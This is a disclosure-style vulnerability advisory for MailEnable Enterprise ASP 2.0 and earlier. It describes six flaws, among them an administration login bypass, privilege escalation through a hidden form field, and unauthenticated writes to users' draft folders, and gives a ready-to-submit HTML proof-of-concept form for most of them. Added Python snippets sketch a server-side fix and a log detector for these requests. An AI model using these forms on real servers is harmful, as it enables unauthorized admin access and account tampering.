
MailEnable Enterprise <= 2.0 (ASP Version) Multiple Vulnerabilities

01 Jul 2014 00:00:00, reported by RootType, seebug (www.seebug.org)

Multiple vulnerabilities found in MailEnable Enterprise ASP Version <= 2.0. Any user can access web administration, gain admin level, disable accounts, write in draft folders, and change passwords without authentication.


Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I found multiple bugs in
MailEnable Enterprise Edition ASP Version <= 2.0, which I have listed below:

1) - Any user can log in to the web administration site.
2) - An authenticated normal user can gain ADMIN or SYSADMIN level; a remote user can also disable his/her account!
3) - Everyone (even unauthenticated users) can write a message in the "Draft" folder of any user!
4) - Everyone can create "myupload.ams" on the server in the "drafts" folder of any user!
5) - Everyone can create "_myupload.csv" on the server in the "drafts" folder of any user!
6) - Changing the password requires the current password, but the current password appears in the source of the "ListAttachments.asp" file; if an XSS attack or session hijacking occurs, the attacker can obtain the user's current password.



Detailed descriptions:

1)
Any user can log in to the web administration site through a bug in "main.asp" (Enterprise).

Proof-of-concept exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/meadmin/enterprise/lang/EN/main.asp" METHOD="POST">
	POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="postmaster"><br>
<input type=submit>
</FORM>
-----------------------End----------------------------

2)
An authenticated normal user can gain ADMIN or SYSADMIN level; a remote user can also disable his/her account!

Bug in the "MailOptions.asp" file: a remote authenticated user can change the value of the hidden field (name="LoginRights")
from "USER" to "ADMIN" or "SYSADMIN" to raise their privilege level, or change the value of the hidden field
(name="LoginStatus") to "0" to disable his/her account!

Proof-of-concept exploit:
-----------------------Start--------------------------
<FORM METHOD="post" ACTION="http://[URL]/MEWebMail/base/default/lang/EN/MailOptions.asp?SelectedIndex=1&FormAction=Edit">

<TABLE BORDER="0">
	<TR><TD>Current Password:</TD><TD><INPUT name=LoginPassword VALUE=""></TD></TR>
	<TR><TD>New Password:</TD><TD><INPUT name=NewLoginPassword VALUE=""></TD></TR>
	<TR><TD>Confirm New Password:</TD><TD><INPUT name=ConfirmNewLoginPassword VALUE=""></TD></TR>
</TABLE>
<INPUT NAME="LoginDescription" VALUE="Login description">
<INPUT NAME="LoginRights" VALUE="SYSADMIN">
<INPUT NAME="LoginStatus" VALUE="1">
<BR><BR>
<INPUT type=submit value="UpTime!">
</FORM>
-----------------------End----------------------------
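
The fix for item 2 is to stop trusting the hidden fields: rights and status must come from server-side state, and a form that tries to change them from an unprivileged session should be rejected. The sketch below is an added example, not MailEnable code; only the form field names come from the advisory, while the function name, the record layout and the policy that only a SYSADMIN session may change these fields are assumptions.

```python
# Added illustration, not MailEnable code. Only the form field names come
# from the advisory; the function, policy and record layout are hypothetical.

SELF_EDITABLE = {"LoginDescription"}           # a user may change these
PRIVILEGED = {                                 # only a SYSADMIN session may
    "LoginRights": {"USER", "ADMIN", "SYSADMIN"},
    "LoginStatus": {"0", "1"},
}


class Rejected(Exception):
    """The submitted form must not be applied (and should be logged)."""


def apply_mail_options(account, session_rights, form):
    """Return an updated copy of `account` for a MailOptions-style POST.

    account        -- server-side record of the login being edited
    session_rights -- rights held in the server-side session, never the form
    form           -- submitted fields; every value is attacker-controlled
    """
    updated = dict(account)
    for name, value in form.items():
        if name in SELF_EDITABLE:
            updated[name] = value
        elif name in PRIVILEGED:
            if value == account[name]:
                continue                       # hidden field echoed unchanged
            if session_rights != "SYSADMIN":
                raise Rejected(f"{name} changed by {session_rights} session")
            if value not in PRIVILEGED[name]:
                raise Rejected(f"invalid {name} value")
            updated[name] = value
        # Any other field (passwords included) is ignored by this handler.
    return updated
```

A rejected form is also a useful tamper signal, since the legitimate page only ever echoes the stored values back.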

3)
Everyone (even unauthenticated users) can write a message in the "Draft" folder of any user!
Bug in the "Resolve.asp" file: this file doesn't check that the user is authenticated!

Proof-of-concept exploit:
--------------Start---------------------
<FORM METHOD="post" ACTION="http://[url]/MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp">

<TABLE BORDER="0">
	<TR><TD>ME_MAILBOX:</TD><TD><INPUT name=ME_MAILBOX VALUE=""></TD></TR>
	<TR><TD>ME_POSTOFFICE:</TD><TD><INPUT name=ME_POSTOFFICE VALUE=""></TD></TR>
	<TR><TD>Folder:</TD><TD><INPUT name=Folder VALUE=""></TD></TR>
	<TR><TD>ID:</TD><TD><INPUT name=ID VALUE=""></TD></TR>
	<TR><TD>ComposeMode:</TD><TD><INPUT name=ComposeMode VALUE="General"></TD></TR>
	<TR><TD>MsgFrom:</TD><TD><INPUT name=MsgFrom VALUE=""></TD></TR>
	<TR><TD>MsgCc:</TD><TD><INPUT name=MsgCc VALUE=""></TD></TR>
	<TR><TD>MsgTo:</TD><TD><INPUT name=MsgTo VALUE=""></TD></TR>
	<TR><TD>MsgBCC:</TD><TD><INPUT name=MsgBCC VALUE=""></TD></TR>
	<TR><TD>MsgBody:</TD><TD><INPUT name=MsgBody VALUE=""></TD></TR>
	<TR><TD>MsgSubject:</TD><TD><INPUT name=MsgSubject VALUE=""></TD></TR>
</TABLE>
<BR><BR>
<INPUT type=submit value="Update"  CLASS=ME_Button>
</FORM>
--------------End---------------------

4)
Creates "myupload.ams" on the server in the "drafts" folder of any user!
Discloses the MailEnable folder path if "username" or "postoffices" is incorrect!

Proof-of-concept exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/default/lang/EN/Forms/MAI/UploadAttachment.asp" ENCTYPE="multipart/form-data" METHOD="POST">
	MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test"><br>
	POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
	AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
	AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
	Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
	Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
	ID<INPUT NAME=ID TYPE="text" VALUE="test"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------

5)
Creates "_myupload.csv" on the server in the "drafts" folder of any user!
Discloses the MailEnable folder path if "username" or "postoffices" is incorrect!

Proof-of-concept exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/enterprise/lang/EN/Forms/vcf/uploadcontact.asp" ENCTYPE="multipart/form-data" METHOD="POST">
	MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test123"><br>
	POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
	AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
	AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
	Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
	Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
	ID<INPUT NAME=ID TYPE="text" VALUE="test123"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------

6)
The password is present in the page source.
Proof:
-----------------------Start--------------------------
http://[URL]/MEWebmail/base/enterprise/lang/EN/Forms/MAI/ListAttachments.asp?Mode=Compose&ID=test.MAI&MsgFormat=HTML&FormAction=Send&ComposeMode=General&Folder=%5CDrafts
-----------------------End----------------------------
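
For anyone reviewing an affected server, items 1 and 3 to 5 share a signature in the web logs: a POST sent straight to one of the pages named above by a client that never picked up a session cookie. The following is an added example, not part of the original advisory; it assumes IIS W3C extended logging with the cs(Cookie) field enabled and that the site uses classic ASP session cookies (ASPSESSIONID...), and the log lines are constructed sample data.

```python
# Added illustration; SAMPLE_LOG is constructed data, not a real capture.
# Page paths are the ones named in the advisory, compared case-insensitively.
WATCHED = (
    "/meadmin/enterprise/lang/en/main.asp",
    "/forms/mai/resolve.asp",
    "/forms/mai/uploadattachment.asp",
    "/forms/vcf/uploadcontact.asp",
)


def find_cookieless_posts(lines):
    """Return (client_ip, uri_stem) for POSTs to watched pages sent without
    any ASP session cookie. Heuristic: a hit deserves review, it is not proof."""
    fields, hits = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for later rows
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-method") != "POST":
            continue
        stem = rec.get("cs-uri-stem", "")
        if not stem.lower().endswith(WATCHED):
            continue
        if "aspsessionid" in rec.get("cs(Cookie)", "-").lower():
            continue                           # client holds a session
        hits.append((rec.get("c-ip"), stem))
    return hits


SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs(Cookie) sc-status
2006-06-10 10:00:01 192.0.2.10 GET /MEWebmail/base/enterprise/lang/EN/Forms/MAI/ListAttachments.asp ASPSESSIONIDQQABCDEF=KJHGFDSA 200
2006-06-10 10:00:05 192.0.2.10 POST /MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp ASPSESSIONIDQQABCDEF=KJHGFDSA 200
2006-06-10 10:02:11 198.51.100.7 POST /MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp - 200
2006-06-10 10:02:40 198.51.100.7 POST /meadmin/enterprise/lang/EN/main.asp - 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem in find_cookieless_posts(SAMPLE_LOG):
        print(ip, stem)
```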


Product name: MailEnable Enterprise Edition
Version: All ASP version <= 2.0
URL: www.mailenable.com
Finder: Soroush Dalili
Team: GSG [Grayhatz.net]
Country: Iran
Site: Grayhatz.net
Email: IRSDL[a.t]Yahoo[d0t]Com

<< I hope secure world for all >>

# milw0rm.com [2006-06-09]

                              
